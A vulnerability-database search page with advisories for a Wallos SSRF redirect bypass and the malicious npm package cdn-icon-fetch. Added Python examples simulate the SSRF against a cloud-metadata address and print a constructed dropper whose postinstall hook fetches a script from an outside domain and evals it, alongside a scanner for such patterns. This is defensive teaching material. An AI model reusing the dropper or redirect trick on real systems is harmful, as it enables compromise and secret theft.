4 matches found
CVE-2026-27479
CVE-2026-27479 affects Wallos versions ≤ 4.6.0, where an SSRF issue arises in the logo/icon URL fetch. The application validates the target URL’s IP, but allows HTTP redirects (CURLOPT_FOLLOWLOCATION = true) and follows up to 3 redirects, bypassing the initial IP check and enabling access to inter...
CVE-2026-27479 Wallos: SSRF via Redirect Bypass in Logo/Icon URL Fetch
Wallos is an open-source, self-hostable personal subscription tracker. Versions 4.6.0 and below contain a Server-Side Request Forgery (SSRF) vulnerability in the subscription and payment logo/icon upload functionality. The application validates the IP address of the provided URL before making the...
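The redirect bypass described in the two entries above, shown as an added example that is not Wallos code and not taken from the advisory. Wallos itself is PHP and relies on libcurl following redirects; this Python model replaces DNS and HTTP with constructed tables (the hostnames, addresses, URLs and bodies are assumptions) so the two fetch strategies can be compared offline. `fetch_vulnerable` checks the submitted URL once and then follows redirects blindly, which is what CURLOPT_FOLLOWLOCATION does on the application's behalf; `fetch_hardened` follows redirects itself and re-validates every hop before requesting it.

```python
import ipaddress
from urllib.parse import urlparse, urljoin

# Constructed stand-in for DNS (hostnames and addresses are assumptions).
FAKE_DNS = {
    "logo.example.com": "93.184.216.34",      # stands in for an ordinary public host
    "metadata.internal": "169.254.169.254",   # cloud metadata address (link-local)
}

# Constructed stand-in for the HTTP transport: url -> (status, headers, body).
# The first entry is the attacker-controlled "logo" URL that redirects inward.
FAKE_HTTP = {
    "https://logo.example.com/icon.png": (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    "https://logo.example.com/real.png": (200, {"Content-Type": "image/png"}, b"\x89PNG\r\n\x1a\n"),
    "http://169.254.169.254/latest/meta-data/": (200, {"Content-Type": "text/plain"}, b"ami-id\ninstance-id\n"),
}

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


class SsrfBlocked(Exception):
    """Raised when a URL (or a redirect target) points somewhere the fetcher must not reach."""


def resolve(host):
    """Resolve a hostname via the constructed table; IP literals need no lookup, unknown names are blocked."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    ip = FAKE_DNS.get(host)
    if ip is None:
        raise SsrfBlocked(f"unresolvable host {host!r}")
    return ip


def is_public_ip(ip_str):
    """True only for globally routable unicast addresses; loopback, RFC 1918, link-local etc. are rejected."""
    ip = ipaddress.ip_address(ip_str)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_url(url):
    """The per-URL check: scheme must be http(s) and the resolved address must be public."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise SsrfBlocked(f"unsupported URL {url!r}")
    ip = resolve(parts.hostname)
    if not is_public_ip(ip):
        raise SsrfBlocked(f"{parts.hostname} resolves to non-public {ip}")
    return ip


def http_get(url, pinned_ip):
    """Constructed transport. A real client must connect to pinned_ip (e.g. curl's CURLOPT_RESOLVE)
    so that a second DNS lookup cannot rebind the host after the check."""
    if url not in FAKE_HTTP:
        raise SsrfBlocked(f"no route to {url!r}")
    return FAKE_HTTP[url]


def fetch_vulnerable(url, max_redirects=3):
    """The flawed pattern: validate the submitted URL once, then follow redirects without re-checking."""
    ip = check_url(url)
    for _ in range(max_redirects + 1):
        status, headers, body = http_get(url, ip)
        if status in REDIRECT_STATUSES and "Location" in headers:
            url = urljoin(url, headers["Location"])   # new host, never re-validated
            continue
        return url, body
    raise SsrfBlocked("too many redirects")


def fetch_hardened(url, max_redirects=3):
    """The fix: the application follows redirects itself and validates (and pins) every hop."""
    for _ in range(max_redirects + 1):
        ip = check_url(url)
        status, headers, body = http_get(url, ip)
        if status in REDIRECT_STATUSES and "Location" in headers:
            url = urljoin(url, headers["Location"])
            continue
        return url, body
    raise SsrfBlocked("too many redirects")


def outcome(fetcher, url):
    """Final URL actually fetched, or "BLOCKED" if the fetcher refused."""
    try:
        final_url, _body = fetcher(url)
        return final_url
    except SsrfBlocked:
        return "BLOCKED"


if __name__ == "__main__":
    for fetcher in (fetch_vulnerable, fetch_hardened):
        print(fetcher.__name__, "->", outcome(fetcher, "https://logo.example.com/icon.png"))
```

With the constructed tables, the vulnerable fetcher ends up reading the metadata body because the only check happened before the 302, while the hardened fetcher rejects the redirect target. Two caveats carry over to a real fix: disable the client's automatic redirect following (in PHP, CURLOPT_FOLLOWLOCATION = false) so that every hop passes through the application's check, and connect to the address that was validated rather than letting the client resolve the name a second time, otherwise DNS rebinding reopens the hole.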
Malicious code in cdn-icon-fetch (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 8c5df12b33f292879e5c1199fb8a0130cbbb1a1cd4cf1d3e72cb723143ccaa1d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Embedded Malicious Code
Overview cdn-icon-fetch is a Malicious package. Affected versions of this package are vulnerable to Embedded Malicious Code. Once this package is installed and executed, it downloads a JavaScript file from a cdn-static-server.vercel.app URL, which appears to be an image hosting site. However, by...
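A triage check for the download-and-execute pattern the two entries above describe, added here as an example; it is not the package's actual contents and not from either advisory. The malicious sample is constructed to mirror the described behaviour (an install hook that fetches a script from the cdn-static-server.vercel.app domain named in the advisory and executes it); the file path on that domain and the code itself are assumptions. The scanner flags three indicators that together make up the classic npm dropper: a lifecycle hook, a remote fetch, and dynamic execution of data.

```python
import json
import re

# Constructed sample of the advisory's pattern. Only the domain comes from the advisory;
# the path, the hook and the code are assumptions for illustration.
MALICIOUS_PKG = {
    "package.json": json.dumps({
        "name": "cdn-icon-fetch",
        "version": "1.0.0",
        "scripts": {"postinstall": "node index.js"},
    }),
    "index.js": (
        'const https = require("https");\n'
        'https.get("https://cdn-static-server.vercel.app/logo.png", (res) => {\n'
        '  let data = "";\n'
        '  res.on("data", (c) => (data += c));\n'
        '  res.on("end", () => eval(data));\n'
        '});\n'
    ),
}

# Constructed benign package for comparison.
BENIGN_PKG = {
    "package.json": json.dumps({
        "name": "tiny-icon-helper",
        "version": "1.0.0",
        "scripts": {"test": "node test.js"},
    }),
    "index.js": (
        'const fs = require("fs");\n'
        'module.exports = (p) => fs.readFileSync(p);\n'
    ),
}

# npm runs these automatically on install, so code reachable from them executes without any import.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# "download something" and "execute what was downloaded" (heuristic, not exhaustive).
REMOTE_FETCH_RE = re.compile(r"\b(?:https?\.(?:get|request)|fetch|axios\.\w+|got)\s*\(")
DYNAMIC_EXEC_RE = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn\w+\s*\(|require\s*\(\s*['\"]child_process['\"]\s*\)"
)
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def scan_package(files):
    """files: dict mapping path -> text content of an unpacked package. Returns the indicators found."""
    manifest = json.loads(files.get("package.json", "{}"))
    scripts = manifest.get("scripts", {}) or {}
    hooks = sorted(k for k in scripts if k in LIFECYCLE_HOOKS)

    sources = [text for path, text in files.items() if path.endswith((".js", ".cjs", ".mjs"))]
    # hook command lines can carry the payload directly (e.g. "curl ... | node"), so scan them too
    sources += list(scripts.values())

    urls = sorted({m.group(0) for text in sources for m in URL_RE.finditer(text)})
    return {
        "lifecycle_hooks": hooks,
        "remote_fetch": any(REMOTE_FETCH_RE.search(t) for t in sources),
        "dynamic_exec": any(DYNAMIC_EXEC_RE.search(t) for t in sources),
        "urls": urls,
    }


def verdict(report):
    """Rough triage: fetch plus dynamic execution reachable from an install hook is the dropper shape."""
    if report["remote_fetch"] and report["dynamic_exec"]:
        return "high" if report["lifecycle_hooks"] else "medium"
    if report["lifecycle_hooks"] and (report["urls"] or report["dynamic_exec"]):
        return "medium"
    return "low"


if __name__ == "__main__":
    for name, pkg in (("constructed malicious", MALICIOUS_PKG), ("constructed benign", BENIGN_PKG)):
        report = scan_package(pkg)
        print(name, verdict(report), report)
```

Regex matching is a first pass, not proof: a package can hide the fetch behind string concatenation or a second-stage dependency, so a "low" verdict does not clear it, while any hit on a lifecycle hook plus a URL is worth opening the file by hand. Running this over every package in a lockfile before install (or setting `ignore-scripts=true` in `.npmrc` and auditing the hooks that then fail) catches the pattern these advisories describe at the point where it would otherwise run.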